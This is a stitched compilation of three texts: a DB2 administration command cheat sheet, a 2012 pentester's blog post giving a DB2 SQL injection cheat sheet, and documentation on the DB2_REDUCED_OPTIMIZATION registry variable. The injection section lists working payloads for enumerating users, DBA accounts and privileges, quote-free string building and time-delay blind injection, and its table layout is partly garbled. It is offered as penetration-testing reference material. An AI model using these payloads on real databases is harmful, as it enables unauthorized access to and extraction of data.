DB2 cheat sheet

Some useful DB2 commands

DB2 System Commands

DB2LEVEL -- checks version of DB2 installed. DB2ILIST -- lists all instances installed DB2CMD -- opens a command line processor DB2CC -- opens db2 control center DB2LICM -l -- gets db2 type.

Command Line Processor Commands

DB2 LIST NODE DIRECTORY -- Lists all nodes DB2 CATALOG TCPIP NODE DB2NODE REMOTE MACHINE215 SERVER 50000 -- catalogs node. In this case, node is db2Node on the machine with name machine215. Port is 50000. DB2 LIST DATABASE DIRECTORY -- list databases DB2 GET DB CFG FOR SAMPLE -- get configuration info for the SAMPLE db. DB2 CONNECT TO alexDB USER myuser USING mypass -- connect to db. In this case, database is alexdb, usern is myuser and password is mypass. DB2 DISCONNECT alexdb -- disconnects DB2 LIST APPLICATIONS SHOW DETAIL -- shows all running db's DB2 GET DBM CFG -- view authentication paramater (e.g. something like server_encrypt) DB2 UPDATE DBM CFG USING AUTHENTICATION SERVER_ENCRYPT -alter the authentication mechanism to server_encrypt DB2 GET AUTHORIZATIONS -- get authorisation level.

Database commands via Command Line Processor (CLP)

DB2 GET DATABASE CONFIGURATION -- gets current database configuration DB2 VALUES CURRENT USER - - gets the current user DB2 VALUES CURRENT SCHEMA -- gets the current schema

DB2 VALUES CURRENT QUERY OPTIMIZATION -- get query optimization level.

Schemas

DB2 SELECT SCHEMANAME FROM SYSCAT.SCHEMATA -- list all schemas DB2 VALUES CURRENT SCHEMA -- gets the current schema DB2 SET SCHEMA ALEXSCHEMA -- set schema

Tables

DB2 LIST TABLES FOR schema_name -- list all tables for particular schema DB2 LIST TABLES SHOW DETAIL; -- show detail about tables DECLARE GLOBAL TEMPORARY TABLE -- declares a temporary table CREATE TABLE MQT AS (SELECT c.cust_name, c.cust_id, a.balance FROM customer c, account a WHERE c._cust_name IN ('Alex') AND a.customer_id - c.cust_id) DATA INITIALLY DEFERRED REFRESH DEFERRED -- Creates a materialised query table. In this case the MQT is based on a join query from the customer and account table.

Tablespaces

DB2 LIST TABLESPACES SHOW DETAIL -- show detail about table spaces SELECT * FROM SYSCAT.TABLESPACES; -- show what syscat has about tablespaces SELECT tbspace, bufferpoolid from syscat.tablespaces; -- get tablespace and bufferpoolid SELECT TABNAME FROM SYSCAT.TABLES WHERE TBSPACE=2; -- Check what TABLES are in tablespace where id = 2.

Constraints

SELECT * FROM SYSCAT.TABCONST; -- Table constraints SELECT * FROM SYSCAT.CHECKS; -- Colum checks SELECT * FROM SYSCAT.COLCHECKS; -- Column constraints SELECT * FROM SYSCAT.REFERENCES; -- Referential constraints

Sequences

CREATE SEQUENCE STESTRESULT AS INTEGER INCREMENT BY 1 START WITH 1 NO MINVALUE NO MAXVALUE NO CYCLE CACHE 10 ORDER; -Create Sequence starting with 1 which cache 10 values SELECT * FROM SYSCAT.SEQUENCES; -- Gets systcat info on sequences VALUES NEXT VALUE FOR MYSEQ; -- Gets next value from sequence myseq ALTER SEQUENCE MYSEQ RESTART WITH 11 INCREMENT BY 1 MAXVALUE 10000 CYCLE CACHE 12 ORDER -- Changes MySeq sequence

Locksize

SELECT TABNAME, LOCKSIZE FROM SYSCAT.TABLES WHERE TABNAME = ' EMPLOYEES'; -- Check locksize which can be tablespace, table, partition, page, row - (usually row).

Bufferpools

SELECT bpname, npages, pagesize from syscat.bufferpools -- get useful buffer pool info. SELECT buffer.bufferpoolid, buffer.bpname, buffer.npages, buffer.pagesize, tablespace.tbspace, tablespace.tbspaceid from syscat.bufferpools buffer, syscat.tablespaces tablespace where tablespace.bufferpoolid = buffer.bufferpoolid; -- gets buffer pool and corresponding tablespace info.

Indexes

SELECT * FROM SYSCAT.INDEXES -- show all indexes SELECT COLNAMES, TABNAME, INDEXTYPE, CLUSTERRATIO, CLUSTERFACTOR FROM SYSCAT.INDEXES WHERE TABNAME = 'TPERSON'; -- some useful columns

Functions

SELECT * FROM SYSCAT.FUNCTIONS; -- check what functions DB has.

SYSDUMMY1 commands

SELECT CURRENT DATE FROM SYSIBM.SYSDUMMY1; -- gets current date. SELECT HEX(36) FROM SYSIBM.SYSDUMMY1; -- same as VALUES HEX(36)

SELECT XMLCOMMENT ('This is an XML comment') FROM SYSIBM.SYSDUMMY1;

Runstats

RUNSTATS ON TABLE TAUSER1.TOSUSER FOR INDEXES ALL; -- runstats for all indexes

Checking the last time runstats was run... SELECT CARD, STATS_TIME FROM SYSCAT.TABLES WHERE TABNAME = 'TOSUSER'; SELECT NLEAF, NLEVELS, FULLKEYCARD, STATS_TIME, TABNAME, INDNAME FROM SYSCAT.INDEXES WHERE TABNAME = 'TOSUSER'; The following catalog columns can be queried to determine if RUNSTATS has been performed on the tables and indexes: If the CARD column of the SYSCAT.TABLES view displays a value of -1, or the STATS_TIME column displays a NULL value for a table, then the RUNSTATS utility has not run for that table. If the NLEAF, NLEVELS and FULLKEYCARD columns of the SYSCAT.INDEXES view display a value of -1, or the STATS_TIME column displays a NULL value for an index, then the RUNSTATS utility has not run for that index.
========@@@@@@@@@@@@@@@@

DB2 SQL injection cheat sheet

Posted on 20/05/2012 by Adrin 2 Comments

Nota: Hay una versin de esta entrada en Espaol aqu. Im sure we all (pentesters) make extensive use of pentestmonkeys SQL injection cheat sheets. They are touchstones when it comes down to SQL injection, and most of the time they save the day. However, DB2 cheat sheet is one of the less complete in pentestmonkeys website. It might be because its not a very common database engine and a fairly complex one. Ive had the luck? of coming across lots of DB2 systems in my last and also in my current job. Hence the missing information was extremely annoying.

Following this lines there is a table with an updated DB2 SQL injection cheat sheet, using pentestmonkeys as starting point. The updated/modified or new fields are marked with an asterisk (*). All of these queries have been tested on a Win32+DB2 v10.1.0, although Ive also had the chance to test some on Z/OS+DB2 v9.x and v8.x and most of them work fine. Please note that Im not a DB2 expert, so If you find errors or inaccurate information, or you know other exciting tricks, please feel free to contact me. Finally, Ive uploaded some DB2 dumps of default privileges, tables with PUBLIC access, and other interesting stuff.

select service_level from table(sysproc.env_get_inst_info()) as instanceinfo Version* select getvariable(sysibm.version) from sysibm.sysdummy1 (v8+) select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo select service_level,bld_level from sysibmadm.env_inst_info Comments select blah from foo comment like this (double dash)

Current User

select user from sysibm.sysdummy1 select session_user from sysibm.sysdummy1 select system_user from sysibm.sysdummy1

DB2 uses OS accounts. Those with DB2 access can be retrieved with: List Users* select distinct(authid) from sysibmadm.privileges priv required select grantee from syscat.dbauth incomplete results select distinct(definer) from syscat.schemata more accurate select distinct(grantee) from sysibm.systabauth same as previous List Password Hashes List Privileges select * from syscat.tabauth shows priv on tables select * from syscat.tabauth where grantee = current user N/A (OS User Accounts)

shows privs for current user List DBA Accounts* Current Database select distinct(grantee) from sysibm.systabauth where CONTROLAUTH=Y select current server from sysibm.sysdummy1

List Databases* select distinct(table_catalog) from sysibm.tables List Columns* select name, tbname, coltype from sysibm.syscolumns also valid syscat and sysstat

List Tables

select table_name from sysibm.tables select name from sysibm.systables

Find Tables From select tbname from sysibm.syscolumns where name=username Column Name Select Nth Row* select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only

Select Nth Char select substr(abc,2,1) FROM sysibm.sysdummy1 returns b Bitwise select bitand(1,0) from sysibm.sysdummy1 returns 0. Also AND/OR/NOT/XO available bitandnot, bitor, bitxor, bitnot R* ASCII Value -> Char Char -> ASCII Value select chr(65) from sysibm.sysdummy1 returns A select ascii(A) from sysibm.sysdummy1 returns 65

Casting

select cast(123 as integer) from sysibm.sysdummy1 select cast(1 as char) from sysibm.sysdummy1

String Concat

select a concat b concat c from sysibm.sysdummy1 returns abc select a || b from sysibm.sysdummy1 returns ab

IF Statement*

Seems only allowed in stored procedures. Use case logic instead.

Case Statement* select CASE WHEN (1=1) THEN AAAAAAAAAA ELSE

BBBBBBBBBB END from sysibm.sysdummy1 Avoiding Quotes* SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 returns ADRI. Works without select too

Heavy queries, for example: Time Delay* and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 If user starts with ascii 68 (D), the heavy query will be executed, delaying the response. However, if user doesnt start with ascii 68, the heavy query wont execute and thus the response will be faster.

select xmlagg(xmlrow(table_schema)) from sysibm.tables returns all in one xml-formatted string Serialize to XML select xmlagg(xmlrow(table_schema)) from (select (for error distinct(table_schema) from sysibm.tables) Same but without based)* repeated elements select xml2clob(xmelement(name t, table_schema)) from sysibm.tables returns all in one xml-formatted string (v8). May need CAST(xml2clob( AS varchar(500)) to display the result. Make DNS Requests Command Execution N/A Seems its only allowed from procedures or UDFs.

Local File Access I think this is only available through stored procedures or db2 tool. Hostname/IP and select os_name,os_version,os_release,host_name from OS INFO* sysibmadm.env_sys_info requires priv Location of DB Files* System Config* select dbpartitionnum, name, value from sysibmadm.dbcfg where name like auto_% Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions. select name, deferred_value, dbpartitionnum from select * from sysibmadm.reg_variables where reg_var_name=DB2PATH requires priv

sysibmadm.dbcfg Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions. What makes sense for DB2 is to know default System Schemas Default System (and maybe tables): Databases* SYSIBM/SYSCAT/SYSSTAT/SYSPUBLIC/SYSIBMADM/SYSTOOLS @@@@@@@@@@@@@@@@@

Setting the DB2_REDUCED_OPTIMIZATION registry variable

If setting the optimization class does not reduce the compilation time sufficiently for your application, try setting the DB2_REDUCED_OPTIMIZATION registry variable. This registry variable provides more control over the optimizer's search space than setting the optimization class. This registry variable lets you request either reduced optimization features or rigid use of optimization features at the specified optimization class. If you reduce the number of optimization techniques used, you also reduce time and resource use during optimization. Although optimization time and resource use might be reduced, there is increased risk of producing a less than optimal query access plan. First, try setting the registry variable to YES. If the optimization class is 5 (the default) or lower, the optimizer disables some optimization techniques that might consume significant prepare time and resources but that do not usually produce a better query access plan. If the optimization class is exactly 5, the optimizer reduces or disables some additional techniques, which might further reduce optimization time and resource use, but also further increase the risk of a less than optimal query access plan. For optimization classes lower than 5, some of these techniques might not be in effect in any case. If they are, however, they remain in effect. If the YES setting does not provide a sufficient reduction in compilation time, try setting the registry variable to an integer value. The effect is the same as YES, with the following additional behavior for dynamically prepared queries optimized at class 5. If the total number of joins in any query block exceeds the setting, the optimizer switches to greedy join enumeration instead of disabling additional optimization techniques. The result is that the query will be optimized at a level that is similar to optimization class 2.